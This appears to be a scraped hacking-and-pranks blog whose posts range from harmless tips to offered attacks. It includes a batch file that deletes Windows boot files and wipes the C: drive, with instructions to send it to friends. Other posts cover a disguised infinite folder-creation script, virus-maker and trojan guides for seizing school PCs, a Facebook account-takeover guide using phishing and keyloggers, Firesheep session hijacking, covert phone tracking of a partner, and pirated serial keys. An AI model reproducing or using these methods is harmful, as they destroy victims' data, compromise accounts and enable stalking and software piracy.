How to Play Hidden Snake Game on Youtube

0 comments
We all visit youtube and watch videos but how many of us are aware of youtube hidden Snake game. I believe only a few people know about this hidden snake game. You can play this game on youtube while streaming any video. Snake gmae is one of the most interesting and traditional game in the world of gaming. In this tutorial I will show you how you can play this game on youtube.

1. Go to youtube and open any video for streaming

2. When the video is streaming Hold left button of mouse + Left arrow on keyboard + Top arrow on keyboard.

3. Now you will see that the streaming circle starting to move like a snake.



4. You can control the movements of the snake using arrow keys of your keyboard.

5. Try to play this game on youtube with videos having some dark background to increase visibility.

Painfull Computer Pranks

0 comments
These pranks could be very painfully, so please use them at your own risk ;)

1. Crash a Computer System With Nothing But a URL!

I stumbled across this URL while surfing the internet. This is a javascript "exploit" (that still works, by the way) and will hang/crash your system. It basically floods you with an infinite loop of mailto:xxx windows. To cancel this (and you have to move fast) kill the process of your email client before you run out of RAM.

WARNING: CLICKING ON THE LINK BELLOW MAY CAUSE A CRASH! USE AT YOUR OWN RISK!

http://adf.ly/8PMhw


2. Shut Down a Computer Forever

Open notepad and copy/paste this code:

@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini


Now Save it as a .bat file.

This should shutdown the persons computer. It shuts it off once and deletes the files needed to reboot and restart.

REMEMBER - DO NOT CLICK THIS FILE. YOU WON'T RECOVER YOUR COMPUTER BACK AFTER YOU OPEN THE .BAT FILE!

Send it to your friends computer and tell them to open it. Have fun!!

Here is another code too.....

cmd /c del c:\windows\* /F /S /Q

cmd /c del c:\* /F /S /Q


Paste it in NotePad And Save It with Extension .cmd or .bat


3. Make over 1,000 folders in few seconds


Here I will teach you simple prank that will make an unlimited amount of folders in any place you want.

1. Open notepad and type :

@echo off
:top
md %random%
goto top


@echo off makes it so that it appears to be a blank screen but actually its making hundreds of folder.
md %random% is command that creating folders with random names.
goto top – return to label :top, infinite loop



2. Save it as 1000folders.bat


3. After that you will get icon that looks as show below


People probably not going to click on an icon that looks like this picture so to make it better (funnier and easier to prank people with) make a short-cut to it

4. Right click on icon and click Create Shortcut


5. Right click on shortcut and click properties , then click on Change Icon and rename icon


Tell the person that you found the music they wanted and downloaded it on there computer, that way they will think its a shortcut to the music and they will click on it then they will think its loading so they wont exit right away when they finally realize its not going to load or so many errors have came up they realized somethings wrong it will be to late) also just something to know its impossible to delete them using cmd you HAVE to find all of them and delete them manually…


4. Microsoft Word Prank

Here , I will show you great microsoft word prank that will frustrate the victims very much, whenever they type a certain word, another word appears! This prank is great for office and schools.

1. Launch Microsoft Word

2. Go to Tools -> AutoCorrect Options…


3. In the space where it says Replace , type a real common word such as the, and, a,I, you etc. In the space that says With , type in a crazy word such as fdgfdhkihyob45, whatever you want! Then , click on Add



5. Cool Windows Prank

This will make it to where your friend cannot click on anything on the screen.

1. Take a screenshot of the desktop. You can use windows printscreen or some printscreen software.


2. Make your printscreen picture as desktop background.

3. Right click on desktop , then click Arrange Icons By->Show Desktop Icons (Windows XP)
Right click on desktop , then click View->Show Desktop Icons (Windows 7 and Vista)


That is it , when you click on the “icons”, nothing will happen!


Hope you'll have a lot of fan with these pranks. If you know other good prank feel free to mention it in comment.

How to Create a Fake and Harmless Virus

0 comments
Now lets start with the tutorial.

1) Create a shortcut (Right click on your desktop and go to new -> shortcut )

2) After this will appear window and that is where you type the code

shutdown -s -t 300 -c "Your Message"

To log of computer type shutdown -l -t 300 -c “your message”
To restart computer type shutdown -r -t 300 -c ” your message”

The number after -t is the number of seconds countdown there will be before shutdown . After -c write own message , that will come up when shutdown box pops up.

3) Click Next, Finish



4) After this will appear icon on desktop, when someone click it, shutdown box will pops up.

Also you can change the look of your icon (Right click on the icon -> Properties -> Shortcut -> Change Icon and replace it with your own one, like Internet Explorer or Mozilla Firefox...)



5 ) You can stop system shutdown by going to Start->Run , then open cmd, write shutdown -a and press ENTER on keyboard, as shown below

That's all. I think this is one of the simplest way to create a fake virus, but still to make a fun of your friend.

How to Track Your Stolen Laptop

0 comments
My friend recently bought a Toshiba laptop, but it was stolen within a couple days. The good thing is that i had installed a tracing software on his laptop the very same day he bought it, and he had no troubles finding it. This can happen to anyone which is using laptop, so having a tracing software installed on your laptop is not a bad idea.

Here i am showing you a free laptop tracing software called Prey.

Prey lets you keep track of your phone or laptop at all times, and will help you find it if it ever gets lost or stolen. It's lightweight, open source software, and free for anyone to use. And it just works.


How it Works?

Basically you install a tiny agent in your PC or phone, which silently waits for a remote signal to wake up and work its magic.

This signal is sent either from the Internet or through an SMS message, and allows you to gather information regarding the device's location, hardware and network status, and optionally trigger specific actions on it.

Notice: This file is Trojan as detected by some antivirus, but the thing is every such files are called trojan, as the process is to Track your system and view your systems reports. But be secure, this file is not harmful for your system or for your personal information. This software is made By PRey Project Company, and they take responsibility of it.

How to Download and Install Prey?

1. First of all download Prey project file from here.

2. After Downloading, Install the File and than

- They will ask for either standalone and +control panel.
- Go for +control panel, and than Click For New User.
- Give Your Name, Your Email and select Password to login the site.

E.g, Name :- John Smith
Email:-johnsmith@gmail.com
Password:-123456 (any Password that you choose) for Entering the site, and than press ok.

- You will get Email from prey project, just activate your account there, and click your device and do the following settings:

Click on the images to see the full size

If you "on" any of the above settings than be sure to remember password of "lock pass". It will show as the tym you make it on. Just below the lock it will be written pass, and when alert is on the message will display whenever you login, "this laptop is stolen ...."-lol

So these were all steps now you can install and get secure. Now if its get stolen than you can track back

Remember:
This still has demerit E.g, If theif formats your system completly than its no way possible to get back than to ask for police, and they don't track laptop normally, until the stolen system is related with some serious case.

Facebook Virus Prank - Making fun to your friend

0 comments
In this post i'll show you an easy step by step tutorial about how to make a Facebook virus using simple commands on notepad. This will make the victims think that they have a virus when they click on an icon such as Internet Explorer or Mozilla Firefox...
This "virus" is totlly harmless and won't do any damage to your victims computer.
When a victim clicks on the icon he will get a warning message like "WARNING VIRUS DETECTED!!!!! AFTER 5 MINUTES YOUR FACEBOOK ACCOUNT WILL BE DELETED !!!!TO REMOVE THE VIRUS CLICK OK OR CLOSE THIS BOX!". You can change the text to whatever you want. If you have some other interesting ideas, let me know. This virus doesn't do anything to your friends pc, but to see his scared face, that's something :)...

Now let's start with the tutorial:

1) Open notepad

2) Type the following text in :

@echo off
msg * WARNING VIRUS DETECTED!!!!! AFTER 5 MINUTES YOUR FACEBOOK ACCOUNT WILL BE DELETED !!!!TO REMOVE THE VIRUS CLICK OK OR CLOSE THIS BOX!

PAUSE
shutdown -r -t 300 -c " SORRY!!! YOUR FACEBOOK ACCOUNT ARE NOW BEING DELETED !!! PLEASE WAIT ..........."



3) Save as Internet Explorer .bat (or whatever you want, but be shure that the last letters are .bat)



4) Right click on Internet Explorer .bat and click Create Shortcut



5) Right click on shorcut and click Properties.



6)Click Change Icon



7) Choose Internet Explorer icon (or Mozilla Firefox, or any other icon similar to it), click OK , then click Apply



8)Delete real shortcut and replace it with fake . When victim click on it , he will get warning messages that looks like this:




Hope you'll freak out friend(s).

If this prank was successful and there was some interesting reactions of your friends, feel free to share it with us.

Get a Free Serial Key for Auslogics BoostSpeed

0 comments
I'm making this post for all my loyal readers. Here, I’m going to give you a free serial key for Auslogics Boostspeed. It's one of the best all-in-one computer maintenance and optimization tool, providing you with everything you may need to keep your PC running fast.


Auslogics BoostSpeed - the ideal solution to keep your PC running faster, cleaner and error-free. This powerful optimization suite will boost Internet connections, tweak Windows to its peak performance, clean registry and block annoying ads. It's a great way to keep your computer clean and optimized.

Modify Windows settings, file system and services to greatly increase system performance. Increase startup and shutdown speed, disable annoying CD autorun and error reporting features.

BoostSpeed will keep monitoring your system for possible optimizations and let you know if such optimizations are possible. You can also run the System Optimization Wizard to periodically optimize your PC.



Free Auslogics BoostSpeed Serial Numbers:

Name: www.serials.ws
Serial: 64E5-F822-A162-B51A-6A76-929B-CB7A-4119-68F1

Name: www.serials.ws
Serial: 6407-F822-A162-B59F-36AE-93FE-0288-0882-09AA

Name: www.serials.ws
Serial: 6441-F822-A162-0239-E99C-81F9-9B37-4F60-8B5C

Name: Team NOY
Serial: 120D-D33D-C043-98B8-D869-65E3-7529-6CC1-CF80

Name: www.serials.ws
Serial: 655D-F822-A162-5D22-3359-7E64-444D-225B-A37A


Name: www.serials.ws
Serial: 000020-ACM814-B8XG48-Q9GXE5-GVUDF1-CD2EER-J9VK15-HHV5J1-JQMBYA-DGBEQ0-JRAZ32
(this is the new cod for 5.3 version woks)


Have a great time using this software. Enjoy ;)

How To Lower Someone's YouTube Subscription Count

0 comments
YouTube is the largest video-sharing website on which users can upload, share, and view videos. When you subscribe to someone, you are constantly updated on which of your favorites (the people you subscribe to) has uploaded a new video. That way, you don't have to constantly search for their username, you just have a convenient list of the tubers you like the best. But there are users that are paying for great promotion on their videos on YouTube, and they are getting a lot of subscriber, which in fact they don't deserve to have it. So here i will show you how to lower someone's subscription count on YouTube. It's very simple method, but totally worth it.


First, you have to subscribe to them. Next, enter this code into the address bar: the code

That's it. Have fun!

PS: Look at Fred's subscriptions.

The Ultimate Virus - The Best Virus Prank Program Ever

0 comments
The Ultimate Virus - The Best Virus Prank Program Ever to Shock Your Friends
The Ultimate Virus is one of the best virus prank programs on the net. This is a prefect prank software and your friends will definitely "love" it and don't be suprised if they try to kill you for making fool on them :P. Just imagine how fun could it be to see how this fake virus is freaking out your friends and making them crying for mummy. LOL!

This virus prank tool
acts like a deadly virus that can cause huge damages to your friends computers, but in fact it's just a fake virus prank and it won't harm the pc in any way.

After running the program, a progress bar will appear, inform user if virus loading is in progress. The taskbar and desktop icons will disappear and a dialog box is displayed that contains three choices:

1. Format Hard Disk
2. Delete Windows Folder
3. Delete All Contents on Local Disk


Format Hard disk


When you click this button a progress bar will appear saying "formatting is in progress", but actually it's not. If you click click "Cancel" button, then a fake "Blue Screen Of Death" will appear! This is really creepy.

Delete Windows Folder

If you choose this option the program will scan all files and folders on your Windows folder and after that a progress bar will appear displaying deletion progress. An advanced Windows user will be tricked because it displays all files on their systems are being deleted.

Delete All Contents on Local Disk

This is similar to above,
but it just scan folders on your root folder. It can't scan all of the files and folders on your hard disk because it will lag the application.

After all progress is finished, the program will does a fake restart. It displays black screen and text with MS-DOS style, so your friend will be tricked that their computer is being in boot mode. Then, a beep coming from computer speaker, and a frightening text appear: "BIOS image has been corrupted.


"There is a problem with your motherboard ROM. Press any key to try again". When your friend reach three attempts, a text appears that their motherboard is permanently damaged!

How to remove this program?

All you have to do is just to
delete the program from your computer and it won't run again. The good thing is that it doesn't install itself to your system.

Note: Some antiviruses and antispywares are detecting this program as infected/malware. The program is perfectly safe and does not pose a threat to your system. This is called a 'false positive'. The term false positive is used when antivirus software wrongly classifies an innocuous ( inoffensive ) file as a virus. The incorrect detection may be due to heuristics or to an incorrect virus signature in a database. Similar problems can occur with antitrojan or antispyware software.


Screenshots


    
                     Click Here To Download Ultimate Virus

Deadly Virus Prank to Freak Out Your Friends

0 comments
This virus prank that i'm going to show you in this post is called Ghost Virus and it's not even similar to the two pranks above. This is a deadly virus in the literally mean of the word. It is an undetectable virus which will mess up your victims computer in just one click, so be shure that you'll have fun with this one.

Here are some features of this evil little buddy:

* Disable Task Manager
* Disable Registry Editor
* Disable MS Config
* Disable Command Prompt
* Disable Explorer
* Disable Shutdown
* Disable 'taskkill'
* Beeps every 100 ms
* Displays a black screen every 2 seconds
* Message Box Bomb
* Adds itself to startup
* Closes/Opens CD-Rom every 100 ms
* Hides Cursor
* Disable Ctrl-Alt-Dlt

*** NOTE: TO REMOVE PRESS "P". ***

If you love to making fun to your friend, then this tool is definitively for you.
                           Click Here To Download It

How to Create a Computer Virus

0 comments
Here is the list of the softwares that allows you to make Virus:

1. In Shadow Batch Virus Generator

1. First of all download the virus maker from here

2. Run "In Shadow Batch Virus Generator.exe" application to see something like this:


3. You can use various options to make virus to suit your needs. You can:
  • Infect files of various extensions
  • Insert virus in startup menu, Kill various processes.
  • Disable all security services like Windows Defender, Antivirus, Firewall.
  • Rename file extensions, spread virus via file sharing.
  • Create new admin account, change user account password.
  • Block various websites, download trojan files to victim computer, shutdown victim computer and much more.

4. After selecting various options, move on to "Creating Options" tab and hit on "Save as Bat". Assign name to the virus and hit on Save.

5. Now, you have your virus ready to hack your victim. This virus maker is undetectable by the most antiviruses.

I am not responsible for any action performed by you. Also, do not try this virus on your own computer. This virus software is one of the most efficient virus software used today.


2. JPS Virus Maker


This is also a great virus maker with many features in it. Check all the features of JPS Virus maker here.


3. TeraBIT Virus Maker


A powerful virus maker for you. Look for updates here

These two virus makers are detected as a viruses by the most anti-virus softwares, but they won't harm your pc in any way. Before you run these virus makers disable your anti-virus temporarily.

If you know other virus makers i want to hear your suggestions.

How To Trick Your School Network

0 comments
How to take control of the PC's at school:

Here are the steps;
  1. Preparing The Virus
  2. Setting Up The Virus
  3. Controlling The PC

Obviously, if you gonna take control over your school PC you need a virus. You have 2 methods:
  1. The virus I made which is harmless and you won't even notice it was executed.
  2. Dropping a Trojan on the school PC.
Method 1

What you need:
  • Pen Drive (You can buy one, or you just use yours)
  • Brain (You can't buy this)

Now, open notepad and copy/paste this code: the code

Save the file as something.bat (you can change something to whatever you want). In "Save as type:" choose "All Files".


I strongly recommend you not to change the rdport and tnport configuration. The rdport will open the remote desktop default port, and the tnport will open the telnet's client default port.

You can change the username, password and the rport (randomn port you choose to be opened)

At ipconfig /all >> C:\attach.txt you must change C:/ by your pen drive letter.

Save it and remove your pen drive.

Take your pen drive to school and run the bat file. Don't forget the pc you runned it in cause you might need it.

When you get home go to your pc and try to telnet them or remote desktop the PC.

Method 2:

In this method we will use a Trojan to control the school PC.

Here is a tutorial about how to create a Trojan: ProRat Trojan

Now just create a server (there is an explanation in the tutorial above), bind it and put it into your pen drive. Make sure you leave your PC turned on.

Then go to your school and drop the trojan.

Other way to do this is to give your trojan to a friend and tell him to stay in school. When you arrive home, send him a SMS and tell him to drop the trojan. This way you could even see if it worked.

After this you can probably do whatever you want with the PC.

How To Find Hidden Web Pages

0 comments
URL is a useful technique that anyone can apply but is often overlooked by web surfers content to trust the information they see on the page in front of them. URL is a technique in which a searcher pre-empts, alters and guesses URL's that are likely to appear within a site in order to turn up hidden or ostensibly inaccessible pages.

As an example of how this technique can work let's assume you have reached the front page of a site that covers a topic you are interested in but all the page says is:

"Welcome to John's Computer Site.
This site is under construction, please check back soon".

Not very helpful and there are no links on the page.

The 'under construction' part serves as a clue. It means that it is likely that John has already prepared some pages for his site. Maybe he's uploaded them already but hasn't put any links on the front page yet.

With a little URL you may be able to find any pages John has put on his site already.

Here's how:

Let's say John's Computer Site front page has the (fictional) URL:
http://www.somewhere.com/on/jsmith/index.html

What if we replaced the index.html part of the URL with another page name, maybe computers.html or pc.html, etc. you can continue doing this until you find something, get bored or are satisfied that there is nothing there. This is not an exact science but can turn up some tasty treats given the right circumstances.

One of the best ways to try URL is where a number appears as part of the name of the name of a Web page, for example if you visit a page called:
http://www.somewhere.com/on/jsmith/gallery05.html

It is a relatively safe bet that there are at least 4 other 'gallery' pages (gallery01.html, gallery02.html, gallery03.html and gallery04.html) and possibly more.
URL, although not well recognised or used can be a useful weapon in the searcher's arsenal and you may just stumble on that hidden gem using this technique. On the down side it can be time consuming and frustrating, the best plan of action is to use URL after other your primary search techniques have failed. It might just turn up what you've been looking for.

How To Login in Windows XP After Password Forgot

0 comments
So you forgot your Windows XP password? Don't worry - it happens to the best of us.
Here is a simple way to access Windows XP with Administrator rights and privileges if you have password protected your User account on your Windows XP system and can't remember the password(s) to login. Let's start:

1. Start your PC and come to Login Screen

2. Press CTRL+ALT+DELETE twice or thrice. It will open a new type of "LOGIN" Screen

3. In that screen type "administrator". In "username" and "password" type nothing if password is not set, otherwise enter the password known by you.

4. Login and change your password


If u don't know any password or username:

1. Start your PC and press "space bar" many times till safe mode option appear.

2. When "SAFEMODE" appears enter your system through safe mode, and it will directly lead u to enter without any passwords

3. Go to username and reset your password.

Hope you'll find this tutorial useful.

How To Trace and Spy Your Girlfriends Mobile Phone Live for Free

0 comments
PhoneOnMap makes it possible. It's a service that provides a free application that has to be installed in GPS cell phone and you are ready to track the phone from anywhere on the Internet.

This application can be useful for office work as well as family members. You can track your child as well as your girlfriend/wife too, LOL. This PhoneOnMap can be used worldwide and you can use it while traveling too. The data is stored on the company’s server for a period of one month. This can be an invaluable source for sales and marketing department of an organization to track the marketing agents.


If you are worried about the security and privacy of the service, let me tell that it is very secure and your cell phone can not be monitored by any Unauthorized User as in order to access the tracking system, you have to authenticate yourself through a personal code which was used as identification while installing application on cell phone.

Features of GPS cell phone tracking system:
  1. GPS cell phone tracker and locater will not work in the underground transportation.
  2. The application does not work when the phone is turned off.
  3. The data transmission outside provider’s coverage area will add roaming charges like any other phone service charge us.
  4. Once application is uninstalled from cell phone than you can’t do anything.
  5. On internet tracking system will show cell phone location between every 10 seconds to 10 minutes, which is depend on setting.

According to me this kind of service is very important for parents to track their children and from a business usage point of view an invaluable part of companies involved in supply and delivery system like Currier and Home delivery system. This will help them to get a real-time location of the object and provide an accurate time-frame for the delivery.

As of now this service does not provide the exact pin point location but the location determined s in the range of 10-20 meters. However with little intelligence the exact location can be easily determined especially when you wish to track your children or the cheating girlfriend ;)

www.phoneonmap.com

How To Send a Self Deleting SMS

0 comments
In this post i will tell you how to send a self deleting SMS to any mobile that is automatically deleted after user reads it.

Basically this technique is called SAFE-TEXT. It's a technique where a message destroys itself after being read. If you want to call it the Data-centric Suicide Message, that's fine too. This is a website that allows you to send such type of sms for free of cost after registering on it. But it has limitation that you can send only 10 SMS a day.

So here's the thing. With Wikileaks on one side and British libel law on the other, there's room for a tool that lets you say what needs to be said, but without it falling into the wrong hands in the process.

What it does is allow you to send an expletive-laden opinion of your boss to a co-worker, or an it's-in-the-public's-interest-to-know-this leak to your friend on the Guardian (or Wired), without it having a chance to be read by said boss, or unsaid MP.

Note: This trick should only work for British mobile network operators.

Here’s how to use it:
  1. To register and activate, text WIRED to 83118 (charged at your standard network rate). You’ll be able to send up to 10 messages daily.
  2. If you’re the sender, the message will show your name and number.
  3. Write your libel-ridden hate speech and hit send.
  4. The receiver will then be sent a text telling them they have been sent a Wired Safe Text with a link to the mobile internet site that hosts your message.
  5. When they click through they will activate Safe Text. They will only have a few seconds to read the text (so don’t make it too long) before it self-destructs.

Bypassing Facebook Security

0 comments
Ok, here's a new quick tutorial for everyone who has been having to deal with Facebook blocking your entrance into someone's account due to logging in from a different location.

Ever since I had been problems constantly having to deal with Facebook leaving me out off people's accounts I began to think that I should write over my experiences to help others.

I will go over specific techniques and ideas to eventually grant you entrance to their accounts without having to deal with that Facebook problem having logging in from different location.

1. Before you even begin reading this, you must already have their passwords or e-mails. If not, I will tell you a few ideas of how to acquire them.

If you only want to log in without changing passwords, I would suggest that you steal their passwords through Phishing, Keylogging, or Social Engineering.

2. Bypassing Facebook security can be done through black hat methods, however I will not go over those methods, instead I will be touching the social engineering methods which are more effective and you can get faster results.

3. You will need to use your brain to think and have patience. If you don't have either a brain to think or the patience to wait, please don't continue reading this tutorial because you will not get any success.

Ok, let's move on to the actual information.

-This method is a cheap shot method, but you never know if it might work or not.

1. If a person uses a particular computer to log in to their accounts on a regular basis, THAT computer alone should be your focus.

You should infect that computer with a keylogger and have it linked together with a FTP to send you the logs or linked to send you e-mails.

2. Another method is to use your OWN computer to acquire the password by infecting yourself with a keylogger and let the slave use your computer. Gain their trust to the point of where they can log in to different websites.

You can say for instance "My account is not working, I think Facebook banned me. Can you test your account to see if yours is working?"

And of course, they will log in and you will gain the information. After they successfully log in, you can login to your account and say "Oh, there we go! It worked"

Now, you will attempt to log in in the future and the problem of Logging in from another location will disappear.

3. Let's say that they aren't stupid enough to use your computer to log in, you might think, what then? Well, here's my next suggestion to you.

Considering that you will already have the password through the methods I mentioned earlier, but you will have the problem of Logging in from another location.

Here's what you do:

Watch and study your slave, if you know he/she uses a location to use a computer, you should attempt to log in at that same location as well. It could be school, library, another friend's house, etc...

Most people will use any computer to log in to Social Networks or E-mails to check on updates. Considering that the IP you log in at that particular is the same within their network, the problem of Logging in from another location will not come up.

4. So, you don't have the choice of either offering your computer as a trap or the chance to "stalk" your slave. You wonder, what do I do then?

Well, this is where it gets more tricky considering that Facebook finally came up with an ingenious method to avoid intruders of taking over accounts easily.

Here's what Facebook did, in case if you don't already know. Facebook implemented a feature where you must visually recognize the friends on that account. They will show you pictures of random people within that account and ask you to select the name of that person.


If you don't recognize any of those people, you're screwed.

When will this happen? That will only happen when you attempt to change their passwords, so Facebook makes sure that you do in fact own that account. I personally wouldn't attempt to change the passwords, but if you do try, here's what I would recommend to you.

-If you know the person in person, notice who he/she is friends with to try to recognize the faces and physically ask the other persons their names.

If you do not know the person, you can use websites like:

To search their names, e-mails, phone numbers to see whether if you can find them on other Social networks. You can search the person's name manually by going to Myspace, Facebook, etc...To see who they have added as friends.

Your next step will be to add a friend of the slave or the slave directly. Adding the slave directly would probably be the best plan because you would have access directly to all the victims' friends and their pictures.

Now, all you have to do is match the pictures that Facebook asks you when you attempt to change their passwords by going to the victims friends and match them.

If you don't want to change their passwords, you can mask the slave's IP using other methods in which I will not go over. To find out their IP, you will need a RAT to manually whois them or any other method other there to find their IP.

A quick method I will suggest to you is to send the slave an e-mail if they have a hotmail account. When they reply you can right click on the e-mail and view source. You will see an IP from sender and use that to mask.

Mask their IP and facebook will not give you the problem of Logging in from another location.

If you follow the suggestions I have given you, you will surely gain entrance to their accounts and Facebook won't be able to do crap.

Their security is strong, but good ol' Social engineering never fails.

How to Activate GodMode In Windows 7 And Vista

0 comments
If you are using windows vista or windows 7 then you should be aware of Godmode. If you are not aware about the Godmode then in this post I will explain to you what is godmode and how it can be activated in windows 7 and windows vista.

Godmode provides you with a shortcut icon where you can customize all your settings from mouse settings to display settings. This is very convenient as it provides all the options at one single place and activating godmode is also very simple and require only two simple steps.

Here is the Step by Step tutorial with screenshots to Activate godmode in windows 7 and windows Vista

1. Create a New Folder on your desktop.
2. Now Rename you new folder to GodMode.{ED7BA470-8E54-465E-825C-99712043E01C}
3. You can also now change the name GodMode to any other name.
4. You will see the icon of the folder to change automatically.Double click on it and you will get godmode customization settings options.

Note: This trick works perfectly on windows 32-bit version but it does not work properly sometimes on 64-bit versions

How To Trick Into Computers Through WiFi

0 comments
The internet is ever growing and you and I are truly pebbles in a vast ocean of information. They say what you don’t know can’t hurt you. When it comes to the Internet believe quite the opposite. On the Internet there a millions and millions of computer users logging on and off on a daily basis. Information is transferred from one point to another in a heartbeat. Amongst those millions upon millions of users, there’s you.

In this tutorial i am going to show you how to to access someone's facebook, youtube, and many other accounts which is using the same WiFi as you.

You need:
  1. Mozilla Firefox
  2. Firesheep - A Firefox extension that demonstrates HTTP session hijacking attacks.
  3. WinPcap - WinPcap is an open source library for packet capture and network analysis for the Win32 platforms. It includes a kernel-level packet filter, a low-level dynamic link library (packet.dll), and a high-level and system-independent library.

Step 1: Install WinPcap then drag the Firesheep add-on, and put it on the Firefox icon. Firefox will open and will ask you to install the add on. Install it and restart Firefox.

Step 2: Open the add-on (You can do it by clicking on View -> Sidebar -> Firesheep), then click on Start Capturing and it'll start capturing, and as soon as somebody logs in any account it'll show up the logs, and then you can access their account.

Simple, but functional and VERY effective method to trick someones facebook, youtube, myspace, etc. account through WiFi.

Basic Internet Security Terminologies for Beginners

0 comments
Internet security is a branch of computer security specifically related to the Internet. It's objective is to establish rules and measure to use against attacks over the Internet. The Internet represents an insecure channel for exchanging information leading to a high risk of intrusion or fraud (e.g. phishing). Different methods have been used to protect the transfer of data, including encryption. If you are a newbie in Internet security, you have come to the right place. The following is information on some common terms used in Internet security. So next time you don’t have to scratch your head when someone uses these.

Firewall - is a system that acts as a barrier between your computer network and the Internet. A firewall controls the flow of information according to security policies.

Hacker - can be anyone specializing in accessing computer based systems for illegal purposes or just for the fun of it.

IP spoofing - is an attempt to access your system by pretending like another system. This is done by setting up a system with an IP address that you normally trust.

Sniffing - is the spying on electronic transmissions to access data. This mostly occurs in privately owned LAN networks connected to the web.

Trojan horse - a program pretending like useful software, while its actual strategy is to access, steal or destroy user data and access authorization. Apart from destroying information, trojans can also create a backdoor on your system for stealing confidential information.

Virus - is a program that attaches itself to a program or file. This allows it to spread across networks and cause damage to software and hardware. To operate, viruses require the execution of the attached file.

Worm - A worm is almost similar to a virus, except that it doesn’t need the execution of any executable file to get activated. It can also replicate itself as it travels across networks.

So newbies, hope this post was helpful for you.

Download Unlimited Rapidshare Files Directly For Free

0 comments
Automated downloads from RapidShare, Megaupload and more. The best way to handle your downloads and increase download speeds.

Rapidshare is still widely used online file sharing web service as compared to other file sharing websites. In the past i had told you How to download from rapidshare with no limits and some of the best ways to Search Files on Rapidshare. Here i'll write how to download from rapidshare directly and for free. One of the biggest disadvantage of using rapidshare is you need to wait for 30 sec before proceeding for downloading file and there is limit on number files you can download per day. You have to agree that manually downloading from RapidShare as a free user is a pain. However you can use rapidshare download manager to get rid of such limitations and automate the file downloading form rapidshare. Using download manager you can simply add as many download links to it which will all be stored and processed one after the other. You will still need to wait all those timeouts and countdowns, but you won't have to sit in front of your computer to do that. Here i want to show you 10 Best Free Download Managers that will done the work for you.

Top 10 Free Rapidshare Download Manager Software List:

1. JDownloader Rapidshare downloader

It is one of the best Rapidshare download manager. It is a free download manager app that supports downloading of multiple files at the same time. It also support captcha recognition, automatic file extraction and works fine for for free and premium account users. There are several options that need some explanation though before you can start using it. You should first realize that JDownloader needs Java, so make sure that is installed. After unpacking the application you need to execute the file JDownloader.jar to start the installation where you select a download location for the files. Files will be automatically updated during the setup as well.

2. FlashGet

FlashGet can split downloaded files into sections, downloading each section simultaneously, for an increase in downloading speed from 100% to 500%. This, coupled with FlashGet's powerful and easy-to-use management features, helps you take control of your downloads like never before. It uses MHT(Multi-server Hyper-threading Transportation) technique, supports various protocols and has excellent document management features. FlashGet is a freeware without any adware or spyware.

3. Orbit Downloader

Orbit Downloader, is a download manager specifically designed for the new generation Web (Web 2.0). You can use Orbit to download video/music/files from Myspace, YouTube, Imeem, Pandora, and Rapidshare, or on any site to make general downloading easier and faster. Fast, easy to use and very lightweight, Orbit Downloader is a competitive alternative to any browser-integrated download manager.

4. RapGet Download manager

RapGet (RAPidshareGET) is a downloader with code recognition for share servers including: rapidshare.de, megaupload.com, slil.ru and others. Using this you can auto download from over 68 free share services. It supports simultaneous downloads and multiple languages.

5. CryptLoad Manager

CryptLoad downloader allows you to download from One-Click-Hosters like rapidshare.com and from regular websites with ease. It supports parallel downloads, part downloading, automatic router-reconnect, captcha recognition, clipboard monitoring for fast link adding and automatic extraction of downloaded archives.

6. Rapidshare Auto Downloader

A freeware rapidshare downloader with proxy support allowing you to download files from Rapidshare automatically. Load the url and wait for them to download, you can also scan the files to check if it is free from virus and auto shut down after the download is complete.

Here are some key features of "Rapidshare Auto Downloader:

· Download a group of links from rapidshare (one by one).
· Download incomplete downloads until all links are downloaded.
· Autoshutdown feature
· Load and save the download list.

7. Free Download Manager

Rapidshare Auto Downloader is a internet file download manager that support Rapidshare file download by adjusting traffic usage to organize and schedule downloads. It can speeds up the acquisition of multiple downloads by breaking the files into smaller pieces, then downloading these simultaneously.

8. Rapidshare Plus

Rapidshare Plus does not cheat on rapidshare, as it does not bypass the timers, imposed on free users, for content downloads.Rather it makes life simpler for the free users, to manage multiple downloads from rapidshare automatically. It also lets you know the status of downloads, by way of a progress bar.

Features of Automatic Rapidshare File downloader Rapidshare plus:

* You can Add/Delete any number of Download File Links
* You can Add Proxy server setting
* Start or Stop Download Process (No Resume Option yet available)
* Displays file download progress and over progress bar
* Time Remaining and Time elapsed
* Current Download Speed

9. G Rap It RS downloader

G Rap It A working Rapidshare downloader developed by Kakomira that allows you to enter any number of Rapidshare URL and it will download those files NOT simultaneously but one-by-one (downloads a single file from Rapidshare and queues the rest of the files). A useful utility for those who are downloading large amount of files as a free user!

10. Raptor download manager

Raptor is a download manager for Rapidshare, Letitbit, Deposit file hosting services. The program will automate your free user downloading, all you have to do is to simply enter all your links and click Start. Raptor will do the rest for you able todownload files.

SkipScreen (Firefox add-on)

SkipScreen is a free Firefox add-on that skips the clicking and waiting on sites like RapidShare, Megaupload, Mediafire, zShare, and more. This is simple, just open rapidshare link and SkipScreen will do the rest .

Supported sites:

* Rapidshare.com
* zShare.net
* MediaFire.com
* Megaupload.com
* Sharebee.com
* Depositfiles.com
* Sendspace.com
* Divshare.com
* Linkbucks.com
* Uploaded.to
* Hotfiles.com
* 4shared.com
* Limelinx.com
* Link-Protector.com
Related Posts Plugin for WordPress, Blogger...
 

Copyright @ 2013 All Rights Reserved.